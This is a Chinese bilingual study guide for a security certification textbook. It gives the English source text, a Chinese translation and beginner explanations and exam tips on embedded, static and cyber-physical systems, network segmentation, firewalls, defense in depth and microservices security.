微控制器 一个微控制器与片上系统(SoC)类似,但复杂度较低(参见第11章)。 微 控制器可以是SoC的一个组成部分。 微控制器是一种小型计算机,包含 CPU、各种输入/输出功能、RAM,以及通常以闪存或闪存/ ROM/PROM/EEPROM形式的非易失性存储。 示例包括树莓派、 Arduino和现场可编程门阵列(FPGA)。 嵌入式系统可能构成安全风险,因为它们通常是静态系统,这意味着即使部署 它们的管理员也没有真正的方法来更改设备的操作以应对安全漏洞。 一些嵌入 式系统可以通过供应商补丁进行更新,但补丁通常在野外发现已知漏洞数月后 才发布。 必须将嵌入式系统与互联网和私有生产网络隔离,以最大限度地减少 远程利用、远程控制或恶意软件入侵的风险。 嵌入式系统的安全问题包括大多数系统旨在最小化成本和冗余功能。 这通常导 致安全措施不足以及升级或补丁困难。 由于嵌入式系统可能控制物理世界中的 某种机制,安全漏洞可能导致人员和财产受损。 静态系统 与嵌入式系统类似的一个概念是静态系统(又称静态环境)。 静态环境是指一 组不发生变化的条件、事件和周围环境。 理论上,一旦理解了静态环境,就不 会再出现新的或令人惊讶的元素。

静态IT环境是指任何旨在由用户和管理员保 持不变的系统。 其目标是防止,或至少减少,用户实施可能降低安全性或功能 运行的更改的可能性。 这也被称为非持久性环境或无状态系统,与允许更改并 在访问事件和重启之间保留更改的持久性环境或有状态系统相对。 静态系统的示例包括机场的自助值机终端、自动取款机,以及酒店或图书馆提 供的免费宾客计算机。 这些宾客计算机被配置为向用户提供一个临时桌面

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 48 / PDF P591

第 591 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

environment to perform a restricted range of tasks. However, when the user terminates their session due to timeout or logging out, the system discards all the previous session's information and changes and restores a pristine version of the environment for the next user. Static systems can be implemented in a variety of ways, including using local VMs or remotely accessed VDI (virtual desktop infrastructure). In technology, static environments are applications, OSs, hardware sets, or networks configured for a specific need, capability, or function, then set to remain unaltered. However, although the term static is used, no truly static systems exist.

There is always the chance that a hardware failure, a hardware configuration change, a software bug, a software-setting change, or an exploit may alter the environment, resulting in undesired operating parameters or actual security intrusions. Sometimes, the phrase static OS refers to the concept of a static system/environment or indicates a slight variation. That variation is that the OS itself is beyond the ability of the user to change, but the user can install or use applications. Often, those applications may be limited, restricted, or controlled to avoid allowing an application to alter the otherwise static OS.

Some potential examples of static OSs would be smart TVs, gaming systems/consoles, or mobile devices where only applications from a vendorcontrolled app store can be installed. Cyber-Physical Systems Cyber-physical systems refer to devices that offer a computational means to control something in the physical world. In the past, these might have been referred to as embedded systems, but the category of cyber-physical seems to focus more on the physical world results rather than the computational aspects. Cyber-physical devices and systems are essentially key elements in robotics and sensor networks.

Basically, any computational device that can cause a movement to occur in the real world is considered a robotic element, whereas any such device that can detect physical conditions (such as temperature, light, movement, and humidity) is a sensor. Examples of cyberphysical systems include prosthetics to provide human augmentation or assistance, collision avoidance in vehicles, air traffic control coordination, precision in robot surgery, remote operation in hazardous conditions, and energy conservation in vehicles, equipment, mobile devices, and buildings. Security Concerns of Embedded and Static Systems

中文直译 / 整理

环境,以执行有限范围的任务。 然而,当用户因超时或注销而终止会话时,系 统会丢弃之前会话的所有信息和更改,并为下一个用户恢复一个纯净的环境版 本。 静态系统可以通过多种方式实现,包括使用本地虚拟机或远程访问的VDI (虚拟桌面基础架构)。 在技术领域中,静态环境是指为满足特定需求、能力或功能而配置的应用程序、 操作系统、硬件集合或网络,之后保持不变。 然而,尽管使用了静态这一术语, 但实际上并不存在真正静态的系统。 硬件故障、硬件配置更改、软件漏洞、软 件设置更改或恶意利用都有可能改变环境,导致非预期的操作参数或实际的安 全入侵。 有时,短语静态操作系统指的是静态系统/环境的概念,或表示一种轻微的变体。 这种变体在于操作系统本身超出了用户更改的能力范围,但用户仍可安装或使 用应用程序。 通常,这些应用程序可能会受到限制、约束或控制,以防止应用 程序改变原本静态的操作系统。 静态操作系统的潜在示例包括智能电视、游戏 系统/主机,或仅允许安装来自厂商控制的应用商店应用程序的移动设备。 信息物理系统 信息物理系统是指提供计算手段以控制物理世界中某事物的设备。

过去,这些 设备可能被称为嵌入式系统,但信息物理这一类别似乎更关注物理世界的结果, 而非计算方面。 信息物理设备和系统本质上是机器人技术和传感器网络中的关 键要素。 基本上,任何能够引发现实世界中运动的计算设备都被视为机器人元 件,而任何能够检测物理条件(如温度、光线、运动和湿度)的此类设备则为 传感器。 信息物理系统的示例包括用于人类增强或辅助的假肢、车辆中的碰撞 避免、空中交通管制协调、机器人手术中的精准操作、危险环境中的远程操作, 以及车辆、设备、移动设备和建筑物中的节能。 嵌入式和静态系统的安全问题

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 591 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 49 / PDF P592

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Embedded, static, network-enabled, and cyber-physical are usually more limited or constrained based on their design or hardware capabilities compared to typical endpoint, server, and networking hardware. These constraints can have security implications. Some embedded systems run on replaceable or rechargeable batteries. Others only receive a small amount of power from a USB plug or special power adapter/converter. These power limitations can restrict the speed of operations, which in turn can limit the execution of security components. If additional power is consumed, the device might overheat. This could result in slower performance, crashing, or destruction.

Most embedded systems use less-capable CPUs. This is due to cost and power savings or limitations. Fewer computing capabilities means fewer functions, which means fewer security operations. Many embedded systems have limited network capabilities. These network capabilities could be limited to wired only or wireless only. Within wireless, the device could be limited to a specific Wi-Fi version, frequency, speed, and/or encryption. Some devices using wireless are limited to special communication protocols, such as Zigbee or Bluetooth Low Energy (BLE). Many embedded systems are unable to process high-end encryption.

The crypto on these special devices is often limited and may use older algorithms or poor keys, or just lack good key management. Some devices are known to have preshared and/or hard-coded encryption keys. Some embedded systems are difficult to patch, whereas others might not even offer patching or upgrading. Without update and patch management, vulnerable code will remain at risk. Some embedded systems do not use authentication to control subjects or restrict updates. Some devices use hard-coded credentials. These should be avoided. Only use equipment that allows for customized credentials, and choose devices that support mutual-certificate authentication.

Some embedded systems have a limited transmission range due to low-power antennae. This can restrict the device's usefulness or require signal boosting to compensate. Due to the low cost of some embedded systems, they might not include necessary security features. Other devices that do include needed security components may be too costly to be considered.

中文直译 / 整理

嵌入式、静态、网络启用和信息物理系统通常因其设计或硬件能力而比典 型的终端、服务器和网络硬件更为受限。 这些限制可能带来安全影响。 一些嵌入式系统使用可更换或可充电电池供电。 其他系统仅通过USB插头或专 用电源适配器/转换器获取少量电力。 这些电力限制可能会限制操作速度,从而 限制安全组件的执行。 如果消耗额外电力,设备可能会过热,导致性能下降、 崩溃甚至损坏。 大多数嵌入式系统使用性能较低的CPU。 这是由于成本和功耗的考虑或限制。 计算能力越少,功能就越少,安全操作也随之减少。 许多嵌入式系统的网络功能有限。 这些网络功能可能仅限于有线或仅限于无 线。 在无线网络中,设备可能仅支持特定的Wi‑Fi版本、频率、速度和/或加 密方式。 一些使用无线通信的设备仅支持特殊通信协议,例如Zigbee或低功 耗蓝牙(BLE)。 许多嵌入式系统无法处理高级加密。 这些专用设备上的加密功能通常受限,可 能使用较旧的算法、较差的密钥,或缺乏良好的密钥管理。 一些设备已知具有 预共享和/或硬编码的加密密钥。 某些嵌入式系统难以打补丁,而其他系统甚至可能不提供补丁或升级功能。 如果没有更新和补丁管理,存在漏洞的代码将一直面临风险。

某些嵌入式系统不使用身份验证来控制主体或限制更新。 一些设备使用硬编 码的凭据。 应避免使用此类设备。 仅使用允许自定义凭据的设备,并选择支 持双向证书身份验证的设备。 某些嵌入式系统由于使用低功率天线,传输范围有限。 这可能会限制设备的实 用性,或需要信号增强来补偿。 由于某些嵌入式系统的成本较低,它们可能不包含必要的安全功能。 其他 包含所需安全组件的设备可能过于昂贵而无法被考虑。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 50 / PDF P593

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Similar to supply chain issues, when an embedded system is used, the organization automatically trusts the device vendor and the cloud service behind it. This implied trust may be misguided. Always thoroughly investigate vendors before relying on their product, and even then, segregate embedded systems in their own constrained network segments. See the discussion of zero trust in Chapter 8. Based on these constraints and other concerns, security management of embedded and static systems must accommodate the fact that most are designed to minimize costs and extraneous features. This often leads to a lack of security mechanisms and difficulty with upgrades or patches.

Static environments, embedded systems, cyber-physical systems, highperformance computing (HPC) systems, edge computing devices, fog computing devices, mobile devices, and other limited or single-purpose computing environments need security management. Although they may not have as broad an attack surface and aren't exposed to as many risks as a general-purpose computer, they still require proper security government. Many of the same general security management principles used over servers and endpoints can be applied to embedded, static, and cyber-physical systems. Network segmentation involves controlling traffic among networked devices.

Complete or physical network segmentation occurs when a network is isolated from all outside communications, which means transactions can occur only between devices within the segmented network. You can impose logical network segmentation with switches using virtual local area networks (VLANs), or through other traffic-control means, including MAC addresses, IP addresses, physical ports, TCP or UDP ports, protocols, or application filtering, routing, and access control management. Network segmentation can isolate embedded devices and static environments to prevent changes and/or exploits from reaching them. See Chapter 11 for more on segmentation.

An application firewall is a device, server add-on, virtual service, or system filter that defines a strict set of communication rules for a service and all users. It's intended to be an application-specific server-side firewall to prevent application-specific protocol and payload attacks. A network firewall is a hardware device designed for general network filtering, typically called an appliance. A network firewall is designed to provide broad protection for an entire network. An internal segmentation firewall (ISFW) is used to create a network division or segment. Every network needs a network firewall. Many application servers need an application firewall. However, the use of an

中文直译 / 整理

与供应链问题类似,当使用嵌入式系统时,组织会自动信任设备供应商及其背 后的云服务。 这种隐含的信任可能是错误的。 在依赖其产品之前,务必彻底调 查供应商,即使如此,也应将嵌入式系统隔离在独立的受限网络段中。 参见第 8章中关于零信任的讨论。 基于这些约束和其他考虑因素,嵌入式和静态系统的安全管理必须考虑到大多 数系统的设计目标是最小化成本和无关功能。 这通常导致安全机制缺失以及升 级或补丁困难。 静态环境、嵌入式系统、网络物理系统、高性能计算(HPC)系统、边缘计算 设备、雾计算设备、移动设备以及其他受限或单一用途的计算环境都需要安全 管理。 尽管它们的攻击面可能不如通用计算机广泛,面临的风险也可能较少, 但仍需要适当的安全管理。 许多用于服务器和终端的一般安全管理原则同样适 用于嵌入式、静态和网络物理系统。 网络分段涉及对网络设备间流量的控制。 当一个网络与所有外部通信完全隔离 时,即发生完全或物理网络分段,这意味着事务只能在分段网络内的设备之间 进行。

您可以使用交换机通过虚拟局域网(VLAN)或其他流量控制手段实施 逻辑网络分段,包括MAC地址、IP地址、物理端口、TCP或UDP端口、协议、 应用过滤、路由和访问控制管理。 网络分段可以隔离嵌入式设备和静态环境, 防止更改和/或攻击影响到它们。 详见第11章关于分段的更多内容。 应用程序防火墙是一种设备、服务器附加组件、虚拟服务或系统过滤器,它为 某个服务及其所有用户定义了一组严格的通信规则。 其设计目的是作为特定于 应用程序的服务器端防火墙,以防止特定于应用程序的协议和负载攻击。 网络 防火墙是一种专为通用网络过滤而设计的硬件设备,通常称为专用设备。 网络 防火墙旨在为整个网络提供广泛的保护。 内部细分防火墙(ISFW)用于创建 网络划分或网段。 每个网络都需要一个网络防火墙。 许多应用服务器需要应用 程序防火墙。 然而,使用一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 51 / PDF P594

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

application firewall generally doesn't negate the need for a network firewall. You should use firewalls in a series to complement each other, rather than seeing them as competitive solutions. See Chapters 11 and 17 for more on firewalls. Security layers exist where devices with different levels of classification or sensitivity are grouped together and isolated from other groups with different levels. This isolation can be absolute or one-directional. For example, a lower level may not be able to initiate communication with a higher level, but a higher level may initiate with a lower level. Isolation can also be logical or physical.

Logical isolation requires the use of classification labels on data and packets, which must be respected and enforced by network management, OSs, and applications. Physical isolation requires implementing network segmentation or air gaps between networks of different security levels. See Chapter 5, “Protecting Security of Assets,” to learn more about managing data and asset classification. Manual updates should be used in static environments to implement only tested and authorized changes. An automated update system would allow untested updates to introduce unknown security reductions. As with manual software updates, strict control over firmware in a static environment is important.

Firmware updates should be implemented on a manual basis, only after thorough testing and review. Firmware version control or oversight of firmware release should focus on maintaining a stable operating platform while minimizing exposure to downtime or compromise. Even embedded and static systems should be monitored for performance, violations, compliance, and operational status. Some of these types of devices can perform on-device monitoring, auditing, and logging, whereas others may require external systems to collect activity data.

Any and all devices, equipment, and computers within an organization should be monitored to ensure high performance and minimal downtime, and to detect and stop violations and abuse. As with any security solution, relying on a single security mechanism is unwise. Defense in depth uses multiple types of access controls in literal or theoretical concentric circles or layers. This form of layered security helps an organization avoid a monolithic security stance. A monolithic mentality is the belief that a single security mechanism is all that is required to provide sufficient security.

With security control redundancy and diversity, a static environment can avoid the pitfalls of a single security feature failing; the

中文直译 / 整理

应用程序防火墙通常并不会取消对网络防火墙的需求。 您应该将防火墙串联 使用,使其相互补充,而不是将它们视为相互竞争的解决方案。 有关防火墙 的更多信息,请参阅第11章和第17章。 安全层存在于将具有不同分类或敏感级别设备分组并与其他不同级别组隔离的 场景中。 这种隔离可以是绝对的或单向的。 例如,较低级别可能无法主动与较 高级别通信,但较高级别可以主动与较低级别通信。 隔离也可以是逻辑的或物 理的。 逻辑隔离要求在数据和数据包上使用分类标签,这些标签必须由网络管 理、操作系统和应用程序尊重并强制执行。 物理隔离则需要在不同安全级别的 网络之间实施网络分段或空气隔离。 请参阅第5章,“保护资产安全”,以了解 更多关于管理和资产分类的信息。 在静态环境中,应使用手动更新来仅实施经过测试和授权的更改。 自动化更新 系统可能导致未经测试的更新引入未知的安全风险。 与手动软件更新一样,在 静态环境中对固件实施严格控制至关重要。 固件更新应仅在经过充分测试和审 查后以手动方式实施。 固件版本控制或固件发布监督应侧重于在最小化停机或 被入侵风险的同时,保持稳定的运行平台。

即使是嵌入式和静态系统,也应监控其性能、违规行为、合规性及运行状态。 其中一些设备可在设备内部执行监控、审计和日志记录,而其他设备则可能需 要外部系统来收集活动数据。 组织内的任何设备、装备和计算机都应进行监控, 以确保高性能和最小化停机时间,并检测和阻止违规行为与滥用。 与任何安全解决方案一样,依赖单一的安全机制是不明智的。 深度防御采用多 种类型的访问控制,以字面或理论上的同心圆或分层形式存在。 这种分层安全 形式有助于组织避免单一的安全立场。 单一心态是指认为仅需一种安全机制即 可提供足够的安全保护。 通过安全控制的冗余性和多样性,静态环境可以避免 因单一安全功能失效而带来的陷阱;

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

多层控制串联、避免单点失败,就是 defense in depth。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

ISO 偏标准和管理体系。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
分层 分层把控制按层排列,让攻击者必须连续突破。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 52 / PDF P595

第 595 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

environment has several opportunities to deflect, deny, detect, and deter any threat. Unfortunately, no security mechanism is perfect. Each individual security mechanism has a flaw or a work-around just waiting to be discovered and abused by a malicious actor. Microservices It is important to evaluate and understand the vulnerabilities in system architectures, especially in regard to technology and process integration. As multiple technologies and complex processes are intertwined in the act of crafting new and unique business functions, new issues and security problems often surface.

As systems are integrated, attention should be paid to potential single points of failure as well as to emergent weaknesses in service-oriented architecture (SOA). An SOA constructs new applications or functions out of existing but separate and distinct software services. The resulting application is often new; thus, its security issues are unknown, untested, and unprotected. All new deployments, especially new applications or functions, must be thoroughly vetted before they can go live into a production network or the public Internet.

Microservices, or microservices architecture, is an architectural style in software development where an application is structured as a collection of small, independently deployable, and loosely coupled services. Each service, often referred to as a microservice, represents a specific business capability and operates as a self-contained unit with its own database and communication mechanisms. Microservices are designed to be scalable, maintainable, and independently deployable, allowing developers to build and enhance different parts of an application without affecting the entire system.

This architectural approach promotes flexibility, agility, and the ability to scale applications more efficiently. It is the conversion or transformation of a capability of one application into a microservice that can be called upon by numerous other applications. Microservices are often created as a means to provide purpose-specific business capabilities through services that are independently deployed. Often, microservices are small, focused on a singular operation, designed with few dependencies, and based on fast short-term development cycles (similar to Agile). It is also common to deploy microservices based on immutable architecture or infrastructure as code.

中文直译 / 整理

环境具备多种机会来防御、拒绝、检测和威慑任何威胁。 然而,没有任何安全 机制是完美的。 每个独立的安全机制都存在缺陷或规避方法,只待恶意行为者 发现并利用。 M icroservices 评估和理解系统架构中的漏洞至关重要,尤其是在技术和流程集成方面。 在构 建新的独特业务功能时,多种技术和复杂流程相互交织,往往会出现新的问题 和安全风险。 随着系统的集成,应注意潜在的单点故障以及面向服务的架构 (SOA)中出现的新兴弱点。 SOA 利用现有的但独立且不同的软件服务构建新 的应用程序或功能。 由此产生的应用程序通常是全新的; 因此,其安全问题未 知、未经测试且未受保护。 所有新部署,尤其是新应用程序或功能,在投入生 产网络或公共互联网之前都必须经过彻底审查。 微服务,或微服务架构,是一种软件开发中的架构风格,其中应用程序被构成 为一系列小型、可独立部署且松耦合的服务。 每个服务通常被称为微服务,代 表特定的业务能力,并作为一个具有独立数据库和通信机制的自包含单元运行。 微服务旨在实现可扩展性、可维护性和独立部署性,使开发人员能够构建和增 强应用程序的不同部分,而不会影响整个系统。

这种架构方法促进了灵活性、 敏捷性以及更高效地扩展应用程序的能力。 它是将一个应用程序的某种能力转 换为可被众多其他应用程序调用的微服务的过程。 微服务通常作为通过独立部署的服务提供特定业务能力的一种手段而创建。 微 服务通常规模较小,专注于单一操作,依赖关系较少,并基于快速的短期开发 周期(类似于敏捷开发)。 此外,通常基于不可变架构或基础设施即代码来部 署微服务。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 595 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 53 / PDF P596

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Microservices are a popular development strategy because they allow large, complex solutions to be broken into smaller, self-contained functions. This design also enables multiple programming groups to work on crafting separate elements or microservices simultaneously. In the context of microservices, APIs play a crucial role. Each microservice exposes an API that allows communication and interaction with other services within the architecture. APIs form the communication channels between these microservices, enabling them to interact seamlessly. Microservices expose well-defined APIs that specify how external components or services can request or manipulate data.

These APIs facilitate the integration and coordination of various microservices, allowing them to work together cohesively within the larger application. The microservices architecture, with its emphasis on modularization, scalability, and flexibility, is well suited for dynamic and evolving applications. The use of APIs ensures that each microservice can be developed, deployed, and updated independently, promoting agility and enabling teams to work on different components of the application concurrently. This approach has gained popularity in modern software development due to its ability to enhance maintainability, scalability, and the overall efficiency of complex applications.

Security is a paramount concern in a microservices architecture due to its architecture's distributed and interconnected nature. Each microservice needs to implement robust security measures to protect sensitive data and ensure the integrity of communication between services. Common security considerations include: Authentication and authorization: Implementing secure authentication mechanisms to verify the identity of users and services, and defining proper authorization policies to control access to microservices. Data encryption: Employing encryption techniques to secure data both in transit and at rest.

This is particularly important when microservices communicate over networks or store sensitive information. API security: Ensuring that APIs are secure by implementing proper authentication, authorization, and encryption for data exchanged between microservices. API gateways are often used to manage and secure API communication.

中文直译 / 整理

微服务是一种流行的发展策略,因为它们允许将大型复杂解决方案分解为更 小、自包含的功能。 这种设计还使多个编程团队能够同时协作开发不同的组 件或微服务。 在微服务的背景下,API 发挥着关键作用。 每个微服务都会暴露一个 API, 以允许在架构内的其他服务之间进行通信和交互。 API 构成了这些微服务之 间的通信通道,使它们能够无缝交互。 微服务暴露了定义明确的 API,这些 API 指定了外部组件或服务如何请求或操 作数据。 这些 API 促进了各种微服务的集成与协调,使它们能够在更大的应用 程序中协同工作。 微服务架构强调模块化、可扩展性和灵活性,非常适合动态且不断演化的应用 程序。 使用 API 确保每个微服务都可以独立开发、部署和更新,从而提升敏捷 性,并使团队能够并行开发应用程序的不同组件。 由于这种做法能够增强可维 护性、可扩展性以及复杂应用程序的整体效率,因此在现代软件开发中广受欢 迎。 由于微服务架构的分布式和互联特性,安全性是其首要关注的问题。 每个微服 务都需要实施强大的安全措施,以保护敏感数据并确保服务之间的通信完整性。

常见的安全考虑包括: 身份验证和授权:实现安全的身份验证机制,以验证用户和服务的身份, 并定义适当的授权策略以控制对微服务的访问。 数据加密:采用加密技术保护传输中和静态数据的安全。 当微服务通过 网络通信或存储敏感信息时,这一点尤为重要。 API安全:通过实施适当的认证、授权和加密机制,确保 API 在微服 务之间交换数据时的安全性。 通常使用 API 网关来管理和保护 API 通 信。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

